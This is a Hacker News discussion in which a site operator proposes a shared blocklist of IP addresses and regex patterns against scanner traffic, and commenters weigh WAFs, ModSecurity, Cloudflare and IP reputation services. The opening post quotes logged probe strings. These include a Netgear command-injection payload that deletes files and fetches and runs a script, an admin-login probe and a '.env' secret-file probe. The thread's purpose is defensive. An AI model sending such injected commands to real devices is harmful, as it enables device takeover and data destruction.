Hacker News new | past | comments | ask | show | jobs | submit login
Ask HN: Can we collaborate on a IP Address or Regex blacklist?
36 points by usernamebias 10 days ago | hide | past | favorite | 43 comments
Hear me out.

I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.

{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "" },

{ "offense": ".env", "ipAddress": "" },

{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+;sh+netgear&curpath=/&currentsetting.htm=1", "ipAddress": "" }

Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

Like a 'ad blocklist' we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a Github.

Project Honeypot has been doing this (IP address reputation scoring) for something like 16 years (disclaimer: I once worked for a sibling company and developed an early Apache module for it).

What you propose is very similar to what happens with email IP reputation. If you look at all of the effort that goes into verifying as few false positives and false negatives as possible, you should probably consider why that effort is put in. Example: what happens if a malicious user who works on behalf of a rival company to yours creates a Pull Request to your list with your customer’s IP addresses? Could you realistically identify the issue and the malicious user before it hurt your corporate reputation?

I don’t think your idea is bad, but you have to realize that the concept of an IP address as a proxy for an actor/reputation is not as valuable in recent years as it used to be. With IPv6 and cheap botnet access, your list will fill up with junk when the attacker spends very little effort to add new GET/POST rules and new clients.

I would recommend you spend some time considering how much you care about this particular cat and mouse game when CDNs and WAFs have already made products which cater to this need.

What are you going to do, when the addresses are SAAS and your blacklist is now impinging your own use of FAANG and DC cloud hosted services?

What are you going to do when the addresses belong to the US mil and are being promiscuously misused by lots of ISPs?

What are you going to do about politically motivated and other non benign influences on the blacklist like wanting to boycott China?

(I work in a regional internet registry so I should declare my interest i guess)

A ton of sketchy stuff comes from people renting time on AWS, GCloud, or some other service provider. One of the ones OP lists -- -- is an AWS ec2 instance. The other one,, looks to be an Azure IP served out of Virginia. Today they could be someone doing something sketchy, but tomorrow they could be assigned to completely legit users.

Sure, you could just block any IP that geolocates Russia, China, or whatever locale is the current worst nation-state actor, but IP blocking is worse than Sisyphean.

It's a bit extreme, but if your service/site is meant to be consumed by physical users (e.g. a B2C type app), you could probably block the entire IP ranges of all the major cloud providers to prevent this kind of behavior. They all publish their CIDRs onlinez, so it wouldn't be difficult.

Wait until you find out how many people use vpn services whose end points are hosted in a cloud provider. IP address blocking is a fools errand.

Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

you could just use modsecurity locally on whatever's between the internet and your web application if you insist something external like cloudflare is out of your control


but bogging this up at application level is not going to work in anyone's favour

Yeah, you're talking about what software like SolarWinds intrusion detection is supposed to do. How well did that work for them?

whats wrong with wanting to boycott china?

Start with your phone and computer.

Manufacturing is already leaving china in droves, which is awesome. I only buy Apple devices and they have been putting a lot of effort into getting out. I hope everyone else follows suit. China is a dangerous, insane dictatorship that is a threat to humanity.

There was a GitHub repo posted sometime ago that contained a list of ASNs (basically ids of datacenters) where most attackers/spammers come from. Simply blocking those ASNs helped the author stop almost all of their bad requests. I wish I bookmarked it but maybe somebody else can chime in...

Thats a great start. But blocking entire data centers seems too aggressive for public SaaS applications.

This has lit a fire in my arse. I'm going to create a repo tomorrow for ExpressJS (I'm a NodeJS nerd).

It can be used like this


It will compare every request to a known .txt of strings such as '.env' and others.

Regex is NOT my forte, Can I count on some of you guys to pitch in?

Yeah you're looking at something external to your application like a layer 7 firewall, I don't think nodejs is the tool for the job here. You want to stop this traffic way before it even hits your web service with an external WAF.

That's beyond my capabilities. I can certainly create a big preliminary .txt file from my dataset, and hopefully the open source community can take it from there.

CloudFlare is not beyond your capabilities.

If you have a domain name (as opposed to just an IP address), you could have finished this project with CloudFlare in the time it took you to post to HN. You are almost certainly going to fall into the free tier.

Disclaimer: I used to work for the founders of CloudFlare.

Note: CloudFlare is not the only SaaS / PaaS in this CDN/WAF space, but it is the easiest to get started with (last I checked).

Have you considered the scale of the problem and how it would affect performance on your server?

Running pattern matching early in Node middleware that checks against a very very large block list will progressively choke every server that implements it.

If you decide to implement it, I recommend you look at how GeoMind API works. IP addresses are just displayed as octets for human readability; use the integer representation for faster+cleaner comparisons.

That's the one, thanks!

That's less of a solution when you aren't able to blackhole route them in BGP

I usually set up nginx to "default ignore" and only respond to specific paths which I can name... works for api only domains at any rate. just use an explicit subfolder like /api/ ... cuts down on the noise.

    location / {
            return 444;
            access_log off;

    location /a/ {

Can't do that when 404's are expected from actual customers. I need to redirect 404 to /

yeah depends on your site structure.. you could always stop the logging (or log to a different file) but return a human 404 with links to legit routes etc. the main thing is to remove the noise so you can focus on the more targeted probing.

I’ve been in various security adjacent jobs over the past 30+ years, and many times I’ve been working with security experts to try to secure some service or another that my team supports.

IP address reputation based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty others found various ways around the blocks we were implementing.

More than 25 years later, and the problem really hasn’t changed that much. You still get lots of people who think they can just block stuff by IP addresses and that will solve all the problems.

The best modern WAFs that I’ve seen in the past five to ten years are probabilistic at best. Set the rejection threshold too low, and you start getting way too many false positive hits. Set the rejection threshold too low, and too many attacks just skip right past the WAF. They are a tool you need to have in your toolbox and you need to make use of them, but they are weak protection, at best. They’re table stakes, which set a low bar for your attackers to clear.

Mod_Security is an excellent example of a free and relatively low effort WAF that you can implement, but there are alternatives. Fastly is a well known commercial CDN/WAF provider, but Cloudflare has their WAF service, AWS has a built-in service, etc....

If you really want to be secure against attackers, you need to make sure that every layer of your code is secure. Do all the standard network scanning and fuzzing tools. Have someone play red team against your system and see if they can penetrate your defenses. Use the source code analysis tools that are appropriate for your language — Fortify might not always be the right answer. Use the dynamic application security tools like the stuff from Contrast Security, where they can scan your object code as it is running in real time and monitor for all known vulnerabilities and attack patterns, and then update that list of things to scan for in real time.

Make sure you actually fix the weaknesses that are turned up by these tools. It doesn’t help you to identify a bunch of problems and then just leave them unfixed.

The OWASP stuff is a start, but they’re just skimming the surface. This is a true deepness with no bottom.

Good idea. It would be nice to feed these bad requests into the per-IP rate limiter and just count them as being more than one request. Fetch index.html, that counts towards the rate limit as 1 request. Fetch DROP DATABASE users.html, that counts as 1000 requests. If your quota is 120 requests per minute (the arbitrary value I picked for my personal website), you're gone for 8 minutes.

How useful it is to rate limit on known attacks, I don't actually know. I feel like you really only need one request to exploit a 0day, so it probably provides no protection.

Loading a big .txt file into memory and comparing each request to it feels like a good first start. Hopefully the open source community takes it further.

Yeah. This is kind of a thing that already exists, it's typically marketed as a "web application firewall". Like most antivirus, it's more for show than anything. Nice layer of protection if someone is really piping HTTP headers directly into database queries without quoting, or installed a 20 years out of date app behind the firewall. Most people aren't really doing that anymore, so the value is unclear to me. But, plenty of people will sell you one, so there must be some value. (Notably, it's required for certain compliance certifications.)

Is there one that comes in (.txt, .csv, etc) that I can download for free? I'd like to put together a proof of concept for ExpressJS (NodeJS) tomorrow.

Doubt this is the state of the art, but ModSecurity seems to exist and has rulesets floating around, like this one from OWASP: https://github.com/coreruleset/coreruleset

Here is a random Node binding for libModSecurity I found: https://github.com/manishmalik/Modsecurity-nodejs

The problem with IP addresses is that many ISPs rotate IPs between customers, especially IPv4 addresses. If an ISP starts running out of addresses, they may have to start using NAT. "Privacy" VPNs also do the same (by design).

A banned IP may be rotated to a legitimate user under many scenarios. Only ban/blackhole IPs for a limited duration.

Is this not sorta like https://www.dronebl.org ?

DroneBL administrator here! DroneBL does list many classes of abusive IPs, although most of our listings originate from IRC (as opposed to, say, Project Honeypot, which sources them from web spam). That said, though, it's apparently very popular to abuse IRC with open proxies, "free" VPNs, and many other sources of rotatable IPs, most of which overlap with what website administrators deal with. I am aware of a few sites that use DroneBL to measurably reduce abuse.

Note, however, that you may find our listing coverage lacking for web-only issues, such as WordPress pingback spammers, forum spammers (not using a proxy or VPN), etc. Especially in comparison to something like Project Honeypot.

A layered defense is the best defense. Firewalling, application hardening, rate-limits, hellbans, risk-scoring, etc., especially in combination with a blacklist, can significantly frustrate and discourage attackers and spammers. No single measure (other than extensive manual moderation queues) will prevent abuse entirely, but the more roadblocks you put up, the more likely the abuser is to give up.

You might want to head over to Shadow Server and take a look at their networking reporting. https://www.shadowserver.org/what-we-do/network-reporting/

Is this not essentially what cloudflare does with the IPs it is tracking? If your ip is showing abuse or problems you get knocked to the "boat or bike" system to at least slow you down a notch?

Maybe it's just me but I tend not to worry much about these scans.

Another issue is that these are all just scripts that scan things randomly and it takes a minute to set it up on a new server.

That means whenever a server is compromised it'd have this type of stuff installed and it'd start running it immediately.

That means two things: the list would indefinitely block servers that have been compromised but then cleaned up, and you'd never get a list comprehensive enough because servers are constantly being compromised.

Why? It's a fruitless endeavor. Keep internet facing things patched, limit exposure of internet facing things. If the idea of seeing those events in a log bothers you, restrict your logging to the paths you care about. :)

Dumb question: how does the checking for .env work?


What about a denylist?

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact